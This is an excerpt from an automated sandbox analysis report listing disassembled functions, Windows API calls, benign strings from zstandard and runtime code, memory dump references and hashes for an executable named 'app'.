                                                                                                                                                                                                            • API String ID: 376477240-1435523161
                                                                                                                                                                                                            • Opcode ID: 18623cdd143b61d6c8c8b0717b3aed02aa3b0ef0f5dfff3217920f3d97a8279a
                                                                                                                                                                                                            • Instruction ID: dd4c16d7157f9a7acb1a01953e37eb36884332f69f8dea908f4122a165dc6272
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18623cdd143b61d6c8c8b0717b3aed02aa3b0ef0f5dfff3217920f3d97a8279a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D415D60E2E646A6EE94EB74D0506BC22A1EB453B0F804332E53E836C5EFBCD961D754
                                                                                                                                                                                                            Function 00007FF7ACE86F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84processsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                                                                            • Opcode ID: 5f16b07142fd6e9cf00bc922e8cc9db10b45bb18e926ceaba9689dfbd1de94f9
                                                                                                                                                                                                            • Instruction ID: 4f9e873300a92253e0117d9ded76cb3d5eae266f2d8749af7d48b1a5b51708c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f16b07142fd6e9cf00bc922e8cc9db10b45bb18e926ceaba9689dfbd1de94f9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9415F32A0D7C2A6EA20EB20F4552AEF3A4FBD4341F810135E69D67BA5DF7CD1548B50
                                                                                                                                                                                                            Function 00007FF8A7FF9280 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_CallDeallocFormatKeywords_MallocMem_MemoryObjectObject_ParseSizeTuple
                                                                                                                                                                                                            • String ID: error setting source size: %s$|Kk:chunker
                                                                                                                                                                                                            • API String ID: 678430365-3480732574
                                                                                                                                                                                                            • Opcode ID: 68ade3941e4397ab05ecacf9e53987e8a466be566a971f3667e5bee79c8f52f5
                                                                                                                                                                                                            • Instruction ID: 5f1e0d0510601ed60c72c62b33baf8dbf8694289c3beaa3d425ae47ae00db7c0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68ade3941e4397ab05ecacf9e53987e8a466be566a971f3667e5bee79c8f52f5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58311732A0AB4191EF40CF65E84836933A4FB88BE4F450235CA6E477A4EF7CD5A5C354
                                                                                                                                                                                                            Function 00007FF8A7FF97C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_CallDeallocFormatKeywords_MallocMem_MemoryObjectObject_ParseSizeTuple
                                                                                                                                                                                                            • String ID: error setting source size: %s$|K:compressobj
                                                                                                                                                                                                            • API String ID: 678430365-3998477729
                                                                                                                                                                                                            • Opcode ID: 013b1dc48d3e34a54222a3bfca695683560905986b701c688c5c62d4b3e3b6db
                                                                                                                                                                                                            • Instruction ID: cf0e3b12329b321aef72580819c39972eefea735c3ca28a41415a0833ef10475
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 013b1dc48d3e34a54222a3bfca695683560905986b701c688c5c62d4b3e3b6db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00212772A0AB42A1EF448F65F84826973A0FB88BE4F450235DA6D467E4EF3CD1A5C314
                                                                                                                                                                                                            Function 00007FF8A7FF2810 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 60COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Buffer_Err_FormatKeywords_ParseReleaseSizeTuple
                                                                                                                                                                                                            • String ID: cannot get frame parameters: %s$not enough data for frame parameters; need %zu bytes$y*:get_frame_parameters
                                                                                                                                                                                                            • API String ID: 2231244333-922659078
                                                                                                                                                                                                            • Opcode ID: 8afd3e7f8eb88f7a59202280d6d82ccb8c528c37513712f5a0adb092143040e9
                                                                                                                                                                                                            • Instruction ID: 95e72ae1338570571ba0bedf46140043e261b5ac13d32914d7cc7678cfb082ce
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8afd3e7f8eb88f7a59202280d6d82ccb8c528c37513712f5a0adb092143040e9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40217C61A0AB46A2EE108B61E85037E73A0FB94BD0F440136D95E877E4DF7CE165D718
                                                                                                                                                                                                            Function 00007FF8A7FFE3D0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_Buffer_FormatKeywords_MallocMem_MemoryParseReleaseSizeTuple
                                                                                                                                                                                                            • String ID: invalid dictionary load mode: %d; must use DICT_TYPE_* constants$y*|I:ZstdCompressionDict
                                                                                                                                                                                                            • API String ID: 3590267281-302309102
                                                                                                                                                                                                            • Opcode ID: 03def8c46e77027d31ebccbb247a34806563c8a1fd9ea056bdcc75c25c9c6cf3
                                                                                                                                                                                                            • Instruction ID: 0df3c2f87d5c0f24d14bd98e5035cee29f829ce014ed5e0ff6d71dc76fe384b8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03def8c46e77027d31ebccbb247a34806563c8a1fd9ea056bdcc75c25c9c6cf3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53214836A19B5191EB00CF25E84466D33A8FB98FD0F210136EA9D937A4DF39D966C380
                                                                                                                                                                                                            Function 00007FF8A8077230 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A807727D
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A8077289
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772CB
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772EE
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80772FB
                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A8077308
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A807733B
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807702F
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077043
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077050
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807705D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077090
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807709D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770B9
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770FB
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077133
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077169
                                                                                                                                                                                                            • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80773B6
                                                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FF8A7FF350E), ref: 00007FF8A80773C4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConditionCriticalSectionVariable$Initializefree$Wakemalloc$DeleteEnterErrorLastLeaveObjectSingleWait_beginthreadex_errnocallocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4219922926-0
                                                                                                                                                                                                            • Opcode ID: 87865d02dce3f75ed65f7839ca0527b85f5c116865141503dd330cd953cafaa9
                                                                                                                                                                                                            • Instruction ID: a9d4db93e6ef8595966e7679b13d13583f2725b3b4e7c8c4b2c964df94a5c817
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87865d02dce3f75ed65f7839ca0527b85f5c116865141503dd330cd953cafaa9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66518932A0AF45A7EF148F25E90026977A0FB59BC4F588635DB8D03B94DF38E4718728
                                                                                                                                                                                                            Function 00007FF7ACE8DB70 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                            • Opcode ID: 905927d9e3da027d40e91907a7f1dd58b6d09944997845db9437df3d999e9f33
                                                                                                                                                                                                            • Instruction ID: 5d1751316ef1f5eab15ddae75398b5635df98f9a966358a2baaa60517066b618
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905927d9e3da027d40e91907a7f1dd58b6d09944997845db9437df3d999e9f33
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE1D732A0D78296EB20AF65D6413ADB7E0FB45B89F410135EE4DABB65CF38E580C710
                                                                                                                                                                                                            Function 00007FF8A7FFD420 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 261COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_FormatInfoKeywords_MemoryParseSizeSystemTuplememset
                                                                                                                                                                                                            • String ID: unable to set compression context parameter: %s$|iiiiiiiiiiiiiiiiiiiii:ZstdCompressionParameters
                                                                                                                                                                                                            • API String ID: 2335633291-3280494838
                                                                                                                                                                                                            • Opcode ID: 8c89cfe1c5ed62ba8a828cc8dcbf265d0d08592995f1d36c9b8f24490d137185
                                                                                                                                                                                                            • Instruction ID: bb9e5c745899a1d5444e772b0ee9730f699d9d9f6fd9f3dc9e33381eeb50bf9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c89cfe1c5ed62ba8a828cc8dcbf265d0d08592995f1d36c9b8f24490d137185
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AD11222B26A109AEB10DF75C4501AD3764EB89BB8F104336DA3D5BBD9CFB9D910DB04
                                                                                                                                                                                                            Function 00007FF7ACE9DCE8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF7ACE9E082,?,?,0000020830AB8C48,00007FF7ACE9A153,?,?,?,00007FF7ACE9A04A,?,?,?,00007FF7ACE953A2), ref: 00007FF7ACE9DE64
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000,?,00007FF7ACE9E082,?,?,0000020830AB8C48,00007FF7ACE9A153,?,?,?,00007FF7ACE9A04A,?,?,?,00007FF7ACE953A2), ref: 00007FF7ACE9DE70
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                            • Opcode ID: 3f9ea5ddd66982662272f3b60427da02763780b89cc10366f1f57cf1354b879c
                                                                                                                                                                                                            • Instruction ID: ef2aa6d2e5a971071294e3ceaeec42b4989394e42f5454e2013f99957e563748
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f9ea5ddd66982662272f3b60427da02763780b89cc10366f1f57cf1354b879c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4413671B1F61271FA15AB169810575E792BF04BA0F8A4235ED0DBB7B8EF3CE5058320
                                                                                                                                                                                                            Function 00007FF7ACE87570 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE8760F
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE8765F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                                                                            • Opcode ID: 4bbd7603499378b50442979c546d1f664acf9c627e90c3cd8d10ddb09143890f
                                                                                                                                                                                                            • Instruction ID: e2ec6177175a16ff15230b6a86fbe89e2ea7d453b012df15b2b9d915e3ad3769
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bbd7603499378b50442979c546d1f664acf9c627e90c3cd8d10ddb09143890f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4419032A0EB82D6E720EF15B44016AF7A4FB84791F9A4135EA8D57BA8DF3CD052D710
                                                                                                                                                                                                            Function 00007FF8A7FF6A90 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_FromLongLong_String
                                                                                                                                                                                                            • String ID: stream is closed$w*:readinto1
                                                                                                                                                                                                            • API String ID: 1736172965-3314369067
                                                                                                                                                                                                            • Opcode ID: 0700df6bf420ed018e7d1d079cb7901cd5b62d4c9962ab880261884f11276b6c
                                                                                                                                                                                                            • Instruction ID: 238f2ee890374b873e0ae4f2c860481d9d388a1c241e7ea0d52fdf56957ce68b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0700df6bf420ed018e7d1d079cb7901cd5b62d4c9962ab880261884f11276b6c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC318E22A0AB8695EF608F29F85037D73A0FB85BC4F54413ADA4D467A8EF7CD155CB04
                                                                                                                                                                                                            Function 00007FF8A7FFF6B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
